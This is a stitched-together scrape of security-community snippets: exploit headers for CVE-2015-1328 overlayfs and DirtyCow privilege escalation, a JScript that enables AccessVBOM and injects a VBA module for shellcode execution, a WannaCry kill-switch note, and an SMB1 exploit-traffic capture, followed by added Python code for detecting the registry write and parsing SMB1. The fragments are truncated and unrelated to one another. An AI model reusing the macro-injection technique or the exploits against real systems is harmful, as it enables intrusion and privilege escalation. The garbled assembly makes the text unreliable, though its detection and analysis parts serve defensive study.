scrapped from @x0rz,@etlow,@Dinosn,@hackerfantastic,@highmeh,@cyb3rops and others
- A quick analysis of the latest Shadow Brokers dump https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/
- Timestamps
import sys
import requests
import re
# Original PoC by Gary @ Sec-1 ltd - https://www.exploit-db.com/exploits/38977/
def get_url(url, user_agent):
    # Fetch url with a caller-controlled User-Agent header and return the response
    headers = {'User-Agent': user_agent}
    return requests.get(url, headers=headers)
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
/*
 * (un)comment correct payload first (x86 or x64)!
 *
 * $ gcc cowroot.c -o cowroot -pthread
 * $ ./cowroot
 * DirtyCow root privilege escalation
 * Backing up /usr/bin/passwd.. to /tmp/bak
 * Size of binary: 57048
 * Racing, this may take a while..
 * /usr/bin/passwd overwritten
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';
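The JScript above only gets to inject a VBA module because it first flips AccessVBOM to 1, a setting a user normally changes through Trust Center, not a script. The Python below is an added example, not code from the page or from any of the accounts it collects: it flags that registry write when the writing process is not an Office binary. The event records are constructed here in a simplified Sysmon RegistryEvent (value set) shape; the field names TargetObject, Details and Image follow Sysmon, the HKU\<SID> prefix is how Sysmon renders HKEY_CURRENT_USER, and the allow-list of Office process names is an assumption to tune for your estate.

```python
# Added example: detect AccessVBOM being enabled by a non-Office process, the
# registry step that precedes VBProject.VBComponents.Add in the JScript above.
import re

# Constructed, simplified Sysmon-style "value set" records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventType": "SetValue",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM",
     "Details": "DWORD (0x00000001)"},
    {"EventType": "SetValue",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Office\\16.0\\Excel\\Security\\AccessVBOM",
     "Details": "DWORD (0x00000000)"},
    {"EventType": "SetValue",
     "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Office\\16.0\\Excel\\Options\\Zoom",
     "Details": "DWORD (0x00000064)"},
]

# Any Office version and any VBA-hosting application, not just the Excel path the script uses.
ACCESS_VBOM = re.compile(
    r"\\Software\\Microsoft\\Office\\(\d+\.\d+)\\(Excel|Word|PowerPoint|Access|Outlook)"
    r"\\Security\\AccessVBOM$", re.I)
DWORD = re.compile(r"DWORD \(0x([0-9a-f]{8})\)", re.I)

# Assumed allow-list: the Office applications themselves toggle this via Trust Center.
OFFICE_BINARIES = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe", "outlook.exe"}


def classify(event):
    """Return a verdict dict for an AccessVBOM write, or None for unrelated events."""
    m = ACCESS_VBOM.search(event["TargetObject"])
    if not m or event.get("EventType") != "SetValue":
        return None
    d = DWORD.fullmatch(event["Details"])
    value = int(d.group(1), 16) if d else None
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    # Enabling (1) from anything other than an Office binary is the injection pattern;
    # an Office app writing 0 is the user turning the setting back off.
    suspicious = value == 1 and image not in OFFICE_BINARIES
    return {"app": m.group(2), "version": m.group(1), "value": value,
            "image": image, "suspicious": suspicious}


def find_vba_tampering(events):
    """All events where programmatic VBA access was enabled by a non-Office process."""
    return [c for c in map(classify, events) if c and c["suspicious"]]


if __name__ == "__main__":
    for hit in find_vba_tampering(SAMPLE_EVENTS):
        print("AccessVBOM enabled by", hit["image"], "for", hit["app"], hit["version"])
```

Pair this with a check for the matching AccessVBOM value still being 1 after the fact: the script never resets it, so a host where the key is enabled without a Trust Center change is worth a look even if the event log has rolled over.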
If www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up, the virus exits instead of infecting the host (source: Malwarebytes). This domain has been sinkholed, stopping the spread of the worm. The kill switch will not work if the host can only reach the internet through a proxy (source). Update: A minor variant of the viru
('connect', 1, 0.0)
('send', 1, b'\x00\x00\x00\x85\xffSMBr\x00\x00\x00\x00\x18S\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00@\x00\x00b\x00\x02PC NETWORK PROGRAM 1.0\x00\x02LANMAN1.0\x00\x02Windows for Workgroups 3.1a\x00\x02LM1.2X002\x00\x02LANMAN2.1\x00\x02NT LM 0.12\x00', 9.812499774852768e-05)
('recv', 1, 0.011641267999948468)
('send', 1, b'\x00\x00\x00\x88\xffSMBs\x00\x00\x00\x00\x18\x07\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00@\x00\r\xff\x00\x88\x00\x04\x11\n\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd4\x00\x00\x00K\x00\x00\x00\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x002\x000\x000\x000\x00 \x002\x001\x009\x005\x00\x00\x00W\x00i\x00n\x00d\x00o\x00w\x00s\x00 \x002\x000\x000\x000\x00 \x005\x00.\x000\x00\x00\x00', 0.011713792999216821)
('recv', 1, 0.00983434200315969)
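The two 'send' payloads above are an SMB1 Negotiate Protocol Request (command byte 'r', 0x72, advertising six dialects from PC NETWORK PROGRAM 1.0 up to NT LM 0.12) and a Session Setup AndX request ('s', 0x73). The Python below is an added example, not code from the page or from any of the accounts it collects: it builds that first message from its fields and decodes it back, so the NetBIOS length, header layout and dialect encoding can be checked against the bytes in the capture. The header defaults (flags 0x18, flags2 0xc053, PID 0xfeff, MID 0x40) are read off the captured bytes; the sample packet is constructed by the code rather than copied from the page.

```python
# Added example: encode and decode the SMB1 Negotiate Protocol Request that opens
# the captured exchange above. NetBIOS session header + 32-byte SMB1 header + body.
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72           # 'r' in the capture
SMB_COM_SESSION_SETUP_ANDX = 0x73  # 's' in the capture
COMMAND_NAMES = {SMB_COM_NEGOTIATE: "Negotiate Protocol",
                 SMB_COM_SESSION_SETUP_ANDX: "Session Setup AndX"}

# Dialects exactly as advertised in the captured request, oldest first; a Windows
# SMB1 server selects "NT LM 0.12".
CAPTURED_DIALECTS = ["PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
                     "LM1.2X002", "LANMAN2.1", "NT LM 0.12"]

# SMB1 header: magic, command, NT status, flags, flags2, PIDHigh, 8-byte signature,
# reserved, TID, PIDLow, UID, MID; everything little-endian, 32 bytes in total.
HEADER_FMT = "<4sBIBHH8sHHHHH"


def smb1_header(command, flags=0x18, flags2=0xC053, tid=0, pid=0xFEFF, uid=0, mid=0x40):
    """Header whose defaults are the field values seen in the capture above."""
    return struct.pack(HEADER_FMT, SMB1_MAGIC, command, 0, flags, flags2, 0,
                       b"\x00" * 8, 0, tid, pid, uid, mid)


def build_negotiate(dialects):
    """NetBIOS session message carrying a Negotiate request for the given dialects."""
    # Each dialect is BufferFormat 0x02 followed by a NUL-terminated ASCII string.
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    # Negotiate has WordCount 0, then the 16-bit ByteCount of the dialect block.
    smb = smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(body)) + body
    # NetBIOS session service: type 0x00 then a 24-bit big-endian length; for 133
    # bytes of SMB this is the b'\x00\x00\x00\x85' prefix seen in the capture.
    return struct.pack(">I", len(smb)) + smb


def parse_smb1(data):
    """Decode the NetBIOS and SMB1 headers; for Negotiate, also the dialect list."""
    if data[0] != 0 or len(data) != 4 + int.from_bytes(data[1:4], "big"):
        raise ValueError("NetBIOS session header does not match payload length")
    smb = data[4:]
    (magic, command, status, flags, flags2, _pid_high, _sig, _res,
     tid, pid, uid, mid) = struct.unpack(HEADER_FMT, smb[:32])
    if magic != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    word_count = smb[32]                     # parameter words follow the header
    byte_count = struct.unpack_from("<H", smb, 33 + 2 * word_count)[0]
    body_start = 35 + 2 * word_count
    body = smb[body_start:body_start + byte_count]
    msg = {"command": COMMAND_NAMES.get(command, "0x%02x" % command), "status": status,
           "flags": flags, "flags2": flags2,
           "unicode": bool(flags2 & 0x8000),    # FLAGS2 bit 15: Unicode strings
           "nt_status": bool(flags2 & 0x4000),  # FLAGS2 bit 14: NT status codes
           "tid": tid, "pid": pid, "uid": uid, "mid": mid,
           "word_count": word_count, "byte_count": byte_count}
    if command == SMB_COM_NEGOTIATE:
        dialects = []
        for entry in body.split(b"\x00"):
            if not entry:
                continue
            if entry[0] != 0x02:
                raise ValueError("malformed dialect entry")
            dialects.append(entry[1:].decode("ascii"))
        msg["dialects"] = dialects
    return msg


if __name__ == "__main__":
    pkt = build_negotiate(CAPTURED_DIALECTS)
    print(len(pkt), pkt[:4].hex())
    print(parse_smb1(pkt))
```

parse_smb1 also accepts the raw 'send' payloads from the timestamps above as-is (copy the bytes literal into a Python bytes object); the second one decodes as Session Setup AndX with WordCount 13, which is the non-extended-security form of that request.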